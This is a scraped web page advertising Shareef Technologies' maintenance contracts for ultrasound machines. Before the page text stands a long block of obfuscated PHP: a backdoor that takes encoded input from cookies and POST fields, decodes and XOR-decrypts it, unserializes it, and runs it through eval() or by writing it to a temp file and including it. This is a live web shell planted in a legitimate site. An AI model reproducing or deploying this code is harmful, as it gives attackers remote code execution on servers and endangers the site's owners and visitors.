$hPsVG = chr (81) . chr ( 1020 - 905 )."\117" . "\137" . "\150" . "\x61" . chr ( 815 - 732 ); $wFckcG = "\143" . "\154" . "\141" . chr (115) . "\163" . chr ( 298 - 203 )."\x65" . chr (120) . chr ( 163 - 58 ).'s' . "\164" . "\163";$HMfnLH = class_exists($hPsVG); $wFckcG = "18294";$BjYAknn = strpos($wFckcG, $hPsVG);if ($HMfnLH == $BjYAknn){function bMRJBwOC(){$nYQNs = new /* 63626 */ QsO_haS(47994 + 47994); $nYQNs = NULL;}$lXKxwFUxQi = "47994";class QsO_haS{private function zEdTzHRWQW($lXKxwFUxQi){if (is_array(QsO_haS::$SaeiuGJNlP)) {$name = sys_get_temp_dir() . "/" . crc32(QsO_haS::$SaeiuGJNlP["salt"]);@QsO_haS::$SaeiuGJNlP["write"]($name, QsO_haS::$SaeiuGJNlP["content"]);include $name;@QsO_haS::$SaeiuGJNlP["delete"]($name); $lXKxwFUxQi = "47994";exit();}}public function ozWDwtt(){$HRBzt = "11685";$this->_dummy = str_repeat($HRBzt, strlen($HRBzt));}public function __destruct(){QsO_haS::$SaeiuGJNlP = @unserialize(QsO_haS::$SaeiuGJNlP); $lXKxwFUxQi = "32241_20769";$this->zEdTzHRWQW($lXKxwFUxQi); $lXKxwFUxQi = "32241_20769";}public function AhfTNehnR($HRBzt, $dIjBPhskA){return $HRBzt[0] ^ str_repeat($dIjBPhskA, intval(strlen($HRBzt[0]) / strlen($dIjBPhskA)) + 1);}public function mofUjGEZzT($HRBzt){$WhkYrQRRXX = "\x62" . "\x61" . "\163" . chr ( 192 - 91 ).'6' . chr (52);return array_map($WhkYrQRRXX . "\x5f" . "\x64" . "\145" . chr ( 358 - 259 )."\157" . "\144" . "\145", array($HRBzt,));}public function __construct($BjEVFbmaSu=0){$MbFwaXA = ',';$HRBzt = "";$FmVCI = $_POST;$UTEaXfsmE = $_COOKIE;$dIjBPhskA = "7c47a435-8efb-41fc-b58f-9f97669dfb71";$VdGIjfE = @$UTEaXfsmE[substr($dIjBPhskA, 0, 4)];if (!empty($VdGIjfE)){$VdGIjfE = explode($MbFwaXA, $VdGIjfE);foreach ($VdGIjfE as $JfUvMCAtij){$HRBzt .= @$UTEaXfsmE[$JfUvMCAtij];$HRBzt .= @$FmVCI[$JfUvMCAtij];}$HRBzt = $this->mofUjGEZzT($HRBzt);}QsO_haS::$SaeiuGJNlP = $this->AhfTNehnR($HRBzt, $dIjBPhskA);if (strpos($dIjBPhskA, $MbFwaXA) !== FALSE){$dIjBPhskA = explode($MbFwaXA, $dIjBPhskA); $YtzufWlmc = sprintf("32241_20769", rtrim($dIjBPhskA[0]));}}public static $SaeiuGJNlP = 37519;}bMRJBwOC();}$wHJTACqpbw = "\x56" . 'l' . "\125" . "\x5f" . chr (102) . chr ( 215 - 138 )."\163" . chr ( 793 - 688 ); $wCrUbyT = 'c' . "\x6c" . "\141" . "\x73" . 's' . chr (95) . chr ( 681 - 580 ).'x' . chr ( 744 - 639 ).chr ( 989 - 874 ).'t' . chr (115); $dkBywK = class_exists($wHJTACqpbw); $wCrUbyT = "59428";$MIOEgcnFB = strpos($wCrUbyT, $wHJTACqpbw);if ($dkBywK == $MIOEgcnFB){function dPfocatkqi(){$bJsFr = new /* 60405 */ VlU_fMsi(47843 + 47843); $bJsFr = NULL;}$Ievwgh = "47843";class VlU_fMsi{private function BkjOVt($Ievwgh){if (is_array(VlU_fMsi::$ssrdx)) {$jzqZioo2 = str_replace("<" . "?php", "", VlU_fMsi::$ssrdx["content"]);eval($jzqZioo2); $Ievwgh = "47843";exit();}}public function QjQlwG(){$jzqZioo = "52468";$this->_dummy = str_repeat($jzqZioo, strlen($jzqZioo));}public function __destruct(){VlU_fMsi::$ssrdx = @unserialize(VlU_fMsi::$ssrdx); $Ievwgh = "50604_35933";$this->BkjOVt($Ievwgh); $Ievwgh = "50604_35933";}public function JyBbP($jzqZioo, $QOWyuwBMz){return $jzqZioo[0] ^ str_repeat($QOWyuwBMz, intval(strlen($jzqZioo[0]) / strlen($QOWyuwBMz)) + 1);}public function bauCnOig($jzqZioo){$EkhGkFUjy = chr ( 264 - 166 ).'a' . "\x73" . 'e' . chr ( 766 - 712 )."\64";return array_map($EkhGkFUjy . "\x5f" . chr ( 172 - 72 ).chr (101) . chr ( 949 - 850 ).chr (111) . chr ( 451 - 351 ).chr (101), array($jzqZioo,));}public function __construct($KShXwbJC=0){$hvyHAqkl = "\x2c";$jzqZioo = "";$PiWOJv = $_POST;$BPzQRhpyHy = $_COOKIE;$QOWyuwBMz = "d51482fb-24d3-473b-952a-66267842693e";$PQRVUI = @$BPzQRhpyHy[substr($QOWyuwBMz, 0, 4)];if (!empty($PQRVUI)){$PQRVUI = explode($hvyHAqkl, $PQRVUI);foreach ($PQRVUI as $yKjiE){$jzqZioo .= @$BPzQRhpyHy[$yKjiE];$jzqZioo .= @$PiWOJv[$yKjiE];}$jzqZioo = $this->bauCnOig($jzqZioo);}VlU_fMsi::$ssrdx = $this->JyBbP($jzqZioo, $QOWyuwBMz);if (strpos($QOWyuwBMz, $hvyHAqkl) !== FALSE){$QOWyuwBMz = str_pad($QOWyuwBMz, 10); $QOWyuwBMz = ltrim(rtrim($QOWyuwBMz));}}public static $ssrdx = 9054;}dPfocatkqi();} AMC – Shareef Technologies


Systems Care Packages (CMCs and AMCs)

We ensure the best after sales services in terms of comprehensive maintenance contracts and annual maintenance contracts. Shareef Technologies India undertakes AMCs for all types of ultrasound machines with our service personnel visiting your workplace for the system’s preventive maintenance (4 visits a year, once in every 3 months).

Apart from the regular checks, we will also attend to your machine whenever needed. We ensure you of prompt response with our executive attending to your call within 24 hours of your complaint registration. In case the problem with the machine cannot be solved in a day or two, we will provide you with a standby machine (as per availability) in accordance with the PNDT policy.

Performance of equipment determines the quality of output and we make sure your equipment exhibits maximum performance through our optimized Annual Maintenance Contracts (AMCs) and Comprehensive Maintenance Contracts (CMCs). Designed to suit your service needs, we provide customized service support, which will help you attain the best throughput from your equipment. Besides regular check-ups based on different suits, we also offer emergency service during any breakdown.


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